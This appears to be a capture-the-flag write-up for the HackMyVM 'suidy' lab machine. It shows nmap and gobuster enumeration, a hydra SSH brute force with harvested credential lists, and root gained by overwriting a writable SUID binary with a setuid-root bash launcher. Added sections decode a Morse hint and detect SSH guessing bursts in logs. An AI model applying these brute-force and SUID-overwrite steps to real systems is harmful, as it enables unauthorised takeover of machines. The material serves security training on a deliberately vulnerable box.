hack-my-vm-suidy

Port scan

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.1.103                 [18:58:56]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 18:59 CST
Nmap scan report for 192.168.1.103
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:B3:E6:17 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds

Let's run a deeper scan on the two open ports.

kali@kali [~] ➜  sudo nmap -sT -sC -sV -O -p22,80 192.168.1.103                                                                                  [18:59:19]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 19:00 CST
Nmap scan report for 192.168.1.103
Host is up (0.00056s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 8a:cb:7e:8a:72:82:84:9a:11:43:61:15:c1:e6:32:0b (RSA)
| 256 7a:0e:b6:dd:8f:ee:a7:70:d9:b1:b5:6e:44:8f:c0:49 (ECDSA)
|_ 256 80:18:e6:c7:01:0e:c6:6d:7d:f4:d2:9f:c9:d0:6f:4c (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:B3:E6:17 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds

Port 80 penetration

kali@kali [~] ➜  sudo dirsearch -u http://192.168.1.103                                                                                          [19:00:48]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.1.103/_25-02-15_19-00-52.txt

Target: http://192.168.1.103/

[19:00:52] Starting:
[19:01:53] 200 - 362B - /robots.txt

Task Completed

Let's take a look at robots.txt.

kali@kali [~] ➜  curl http://192.168.1.103/robots.txt                                                                                            [19:02:11]
/hi
/....\..\.-\--.\.-\..\-.

/shehatesme

The last directory listed above is hidden fairly well; let's visit it.
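
The middle line of that robots.txt is Morse code with letters separated by backslashes. The decoder below is an added example and not part of the original write-up; ROBOTS_LINE is the line copied from the curl output above, and it decodes to HIAGAIN, a greeting rather than a directory name, so the plain-text /shehatesme entry is the real lead. The is_morse_line() filter is an assumption about what is worth decoding, not something the page describes.

```python
"""Decode the Morse line from the robots.txt above: letters are separated by
backslashes and words by slashes."""

# International Morse table (letters and digits)
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}

# The robots.txt line copied from the page (raw string so the backslashes survive)
ROBOTS_LINE = r"/....\..\.-\--.\.-\..\-."


def decode_morse(text, letter_sep="\\", word_sep="/"):
    """Return the decoded text; unknown symbols become '?' instead of raising."""
    words = []
    for word in text.split(word_sep):
        letters = [MORSE.get(sym, "?") for sym in word.split(letter_sep) if sym]
        if letters:
            words.append("".join(letters))
    return " ".join(words)


def is_morse_line(text):
    """Quick filter (an assumption of this example): only dots, dashes and
    separators make a line worth decoding."""
    stripped = text.strip()
    return bool(stripped) and set(stripped) <= set(".-\\/ ")


if __name__ == "__main__":
    for line in ["/hi", ROBOTS_LINE, "/shehatesme"]:
        if is_morse_line(line):
            print(line, "->", decode_morse(line))
```

The word separator is configurable because the more common convention is a space between letters and a slash between words; the backslash convention here is specific to this robots.txt.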

This is telling us to scan the site for files with the .txt extension.

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.1.103/shehatesme/ -x txt [19:05:11]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.103/shehatesme/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/full.txt (Status: 200) [Size: 16]
/about.txt (Status: 200) [Size: 16]
/search.txt (Status: 200) [Size: 16]
/privacy.txt (Status: 200) [Size: 16]
/blog.txt (Status: 200) [Size: 16]
/new.txt (Status: 200) [Size: 16]
/page.txt (Status: 200) [Size: 16]
/forums.txt (Status: 200) [Size: 16]
/jobs.txt (Status: 200) [Size: 16]
/other.txt (Status: 200) [Size: 16]
/welcome.txt (Status: 200) [Size: 16]
/admin.txt (Status: 200) [Size: 16]
/faqs.txt (Status: 200) [Size: 16]
/2001.txt (Status: 200) [Size: 16]
/link.txt (Status: 200) [Size: 16]
/space.txt (Status: 200) [Size: 16]
/network.txt (Status: 200) [Size: 16]
/google.txt (Status: 200) [Size: 16]
/folder.txt (Status: 200) [Size: 16]
/java.txt (Status: 200) [Size: 16]
/issues.txt (Status: 200) [Size: 16]
/guide.txt (Status: 200) [Size: 16]
/es.txt (Status: 200) [Size: 16]
/art.txt (Status: 200) [Size: 16]
/smilies.txt (Status: 200) [Size: 16]
/airport.txt (Status: 200) [Size: 16]
/secret.txt (Status: 200) [Size: 16]
/procps.txt (Status: 200) [Size: 16]
/pynfo.txt (Status: 200) [Size: 16]
/lh2.txt (Status: 200) [Size: 16]
/muze.txt (Status: 200) [Size: 16]
/alba.txt (Status: 200) [Size: 16]
/cymru.txt (Status: 200) [Size: 16]
/wha.txt (Status: 200) [Size: 16]
Progress: 441122 / 441124 (100.00%)
===============================================================
Finished
===============================================================

Visit each one, collect the usernames and passwords into two lists, and brute-force SSH with them.

kali@kali [~] ➜  cat user                                                                                                                        [19:12:39]
yuijhse
jaime11
hidden1
jhfbvgt
maria11
john765
mmnnbbv
smileys
nhvjguy
theuser
kali@kali [~] ➜ cat passwd [19:12:43]
hjupnkk
JKiufg6
passZZ!
iugbnvh
jhfgyRf
FDrhguy
iughtyr
98GHbjh
kjhgyut
thepass
kali@kali [~] ➜ hydra -L user -P passwd -t 32 ssh://192.168.1.103 [19:13:29]

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-15 19:14:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 32 tasks per 1 server, overall 32 tasks, 100 login tries (l:10/p:10), ~4 tries per task
[DATA] attacking ssh://192.168.1.103:22/
[22][ssh] host: 192.168.1.103 login: theuser password: thepass
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-15 19:14:48
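
Seen from the target, the run above is 100 password attempts from one address in well under a minute, followed by a successful login from that same address. The script below is an added example, not part of the original write-up: it parses sshd lines in auth.log format, counts failures per source address inside a sliding window, and reports any login accepted from that address after the burst began. SAMPLE_AUTH_LOG is constructed for the example (the usernames are from the page's list and 192.168.1.4 is the address the later "Last login ... from" banner shows; the timestamps, PIDs and ports are made up), and the threshold and window are assumptions.

```python
"""Spot an SSH password-guessing burst in sshd log lines and note any
successful login that follows it from the same source address."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the format sshd writes to auth.log (not captured from
# the box). 192.168.1.4 plays the guessing client; 10.0.0.7 is a normal
# key-based login used as a control.
SAMPLE_AUTH_LOG = """\
Feb 15 19:14:31 suidy sshd[1201]: Failed password for invalid user yuijhse from 192.168.1.4 port 50210 ssh2
Feb 15 19:14:31 suidy sshd[1202]: Failed password for invalid user jaime11 from 192.168.1.4 port 50211 ssh2
Feb 15 19:14:32 suidy sshd[1203]: Failed password for invalid user hidden1 from 192.168.1.4 port 50212 ssh2
Feb 15 19:14:32 suidy sshd[1204]: Failed password for invalid user maria11 from 192.168.1.4 port 50213 ssh2
Feb 15 19:14:33 suidy sshd[1205]: Failed password for invalid user john765 from 192.168.1.4 port 50214 ssh2
Feb 15 19:14:35 suidy sshd[1206]: Failed password for theuser from 192.168.1.4 port 50215 ssh2
Feb 15 19:14:36 suidy sshd[1207]: Failed password for theuser from 192.168.1.4 port 50216 ssh2
Feb 15 19:14:48 suidy sshd[1240]: Accepted password for theuser from 192.168.1.4 port 50260 ssh2
Feb 15 19:20:02 suidy sshd[1300]: Failed password for admin from 10.0.0.7 port 40000 ssh2
Feb 15 19:20:09 suidy sshd[1301]: Accepted publickey for admin from 10.0.0.7 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_sshd_line(line):
    """Return a dict for a password/publickey auth line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    # syslog timestamps carry no year; the default year is fine for ordering
    ev["ts"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")
    return ev


def max_burst(times, window):
    """Largest number of (sorted) events falling inside any window-long interval."""
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def analyze(log_text, threshold=5, window_seconds=60):
    """Per source IP: failed attempts, distinct users tried, largest burst in
    one window, and users whose login was accepted after the first failure.
    flagged is True when the burst reaches the threshold."""
    events = [e for e in map(parse_sshd_line, log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    window = timedelta(seconds=window_seconds)
    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "Failed"]
        first_fail = fails[0]["ts"] if fails else None
        burst = max_burst([e["ts"] for e in fails], window)
        accepted = [e["user"] for e in evs
                    if e["result"] == "Accepted" and first_fail is not None
                    and e["ts"] >= first_fail]
        findings.append({
            "ip": ip,
            "failures": len(fails),
            "users_tried": sorted({e["user"] for e in fails}),
            "max_burst": burst,
            "accepted_after_failures": accepted,
            "flagged": burst >= threshold,
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_AUTH_LOG):
        print(f)
```

The hydra warning about parallel tasks refers to OpenSSH's MaxStartups limit (default 10:30:100), which throttles unauthenticated connections; it slows a run like this down but does not stop a patient one, so the log check is the signal that matters.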

Log in over SSH with the recovered credentials.

Privilege escalation

kali@kali [~] ➜  ssh theuser@192.168.1.103                                                                                                       [19:14:48]
theuser@192.168.1.103's password:
Linux suidy 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Feb 15 09:37:39 2025 from 192.168.1.4
theuser@suidy:~$ ls
user.txt
theuser@suidy:~$ cat user.txt |base64
SE1WMjM1M0lWSQo=
theuser@suidy:~$

Run linpeas and pspy straight away.

theuser@suidy:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/02/15 12:17:51 CMD: UID=0 PID=1 | /sbin/init
2025/02/15 12:18:01 CMD: UID=0 PID=1125 | /usr/sbin/CRON -f
2025/02/15 12:18:01 CMD: UID=0 PID=1126 | /usr/sbin/CRON -f
2025/02/15 12:18:01 CMD: UID=0 PID=1127 | /bin/sh -c sh /root/timer.sh
2025/02/15 12:18:01 CMD: UID=0 PID=1128 | sh /root/timer.sh
2025/02/15 12:19:01 CMD: UID=0 PID=1129 | /usr/sbin/CRON -f
2025/02/15 12:19:01 CMD: UID=0 PID=1130 | /usr/sbin/CRON -f
2025/02/15 12:19:01 CMD: UID=0 PID=1131 | /bin/sh -c sh /root/timer.sh
2025/02/15 12:19:01 CMD: UID=0 PID=1132 | sh /root/timer.sh

We find a script, timer.sh, that runs regularly, but it lives under /root and we have no permission to access it.

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
You can write SUID file: /home/suidy/suidyyyyy
-rwsr-xr-x 1 root root 63K ene 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 35K ene 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 51K ene 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 83K jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 53K jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 63K jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 44K jul 27 2018 /usr/bin/chsh
-rwsr-xr-- 1 root messagebus 50K jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K ene 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K mar 28 2017 /usr/lib/eject/dmcrypt-get-device

So the suidyyyyy file is the one; we have write permission on it.

theuser@suidy:/home/suidy$ file suidyyyyy 
suidyyyyy: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=1be0c4949efc74fe829196ecb3ac6e9c0b642986, not stripped

It's a binary, so we overwrite it with our own privilege-escalation binary and let the SUID bit do the rest.

theuser@suidy:/tmp$ nano 1.c
theuser@suidy:/tmp$ cat 1.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
theuser@suidy:/tmp$ gcc 1.c -o 1
theuser@suidy:/tmp$ cp 1 /home/suidy/suidyyyyy
theuser@suidy:/tmp$
theuser@suidy:/home/suidy$ ./suidyyyyy 
root@suidy:/home/suidy# id
uid=0(root) gid=0(root) grupos=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(theuser)
root@suidy:/home/suidy# whoami
root

Rooted.